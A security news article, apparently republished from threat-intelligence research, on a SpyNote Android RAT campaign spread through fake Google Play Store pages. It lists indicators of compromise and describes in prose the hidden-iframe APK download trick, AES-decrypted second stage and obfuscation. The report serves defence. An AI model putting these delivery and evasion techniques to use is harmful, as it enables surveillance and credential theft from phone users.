A sophisticated Android malware campaign has resurfaced, exploiting deceptive websites that perfectly mimic legitimate Google Play Store application pages to distribute the notorious SpyNote Remote Access Trojan (RAT).
This malicious operation targets unsuspecting users by creating static HTML clones of popular Android application install pages, complete with copied CSS styling and JavaScript functionality designed to trick victims into downloading malicious APK files directly from compromised servers.
The SpyNote malware represents a formidable threat in the mobile security landscape, functioning as a highly intrusive Android RAT with extensive surveillance capabilities.
Once installed, the malware can remotely control device cameras and microphones, manage phone calls, execute arbitrary commands, and perform sophisticated keylogging operations that specifically target application credentials.
.webp "Beware of Website Mimicking Google Play Store Pages to Deliver Android Malware 3")
The main concern is that it uses Android’s Accessibility Services to steal two-factor codes and trick users with fake screens.
Domaintools researchers identified this persistent campaign as a continuation of previous SpyNote activity, noting significant tactical evolution in the threat actor’s approach.
The malicious infrastructure predominantly utilizes two IP addresses – 154.90.58[.]26 and 199.247.6[.]61 – with domains registered through NameSilo LLC and XinNet Technology Corporation.
The fake websites consistently include specific JavaScript libraries and employ nginx servers hosted on Lightnode Limited and Vultr Holdings LLC infrastructure.
Advanced Infection Mechanism and Payload Delivery
The infection process begins when users encounter convincing Google Play Store mimics that trigger malicious downloads through a carefully crafted JavaScript function.
.webp "Beware of Website Mimicking Google Play Store Pages to Deliver Android Malware 4")
The core malicious functionality relies on a download() function that creates hidden iframes and sets their source to JavaScript URIs, effectively initiating APK downloads without users leaving the current page.
The malware employs a sophisticated multi-stage deployment process utilizing dynamic payload techniques and DEX Element Injection.
The initial dropper APK (Chrome.apk with hash 48aa5f908fa612dcb38acf4005de72b9379f50c7e1bc43a4e64ce274bb7566) reads encrypted assets, generates decryption keys from its AndroidManifest file, and decrypts the second-stage SpyNote payload.
The dropper extracts the package name “rogcysibz.wbnyvkrn.sstjjs” to retrieve the 16-byte AES key “62646632363164386461323836333631” for payload decryption.
The malware demonstrates advanced anti-analysis capabilities through control flow obfuscation and identifier obfuscation, using random variations of characters like ‘o’, ‘O’, and ‘0’ for all function names.
This technique significantly complicates static analysis, while the dynamic loading mechanism ensures the primary malicious functions remain concealed until runtime execution, effectively bypassing traditional security detection methods.
Boost your SOC and help your team protect your business with free top-notch threat intelligence: Request TI Lookup Premium Trial.
Source link
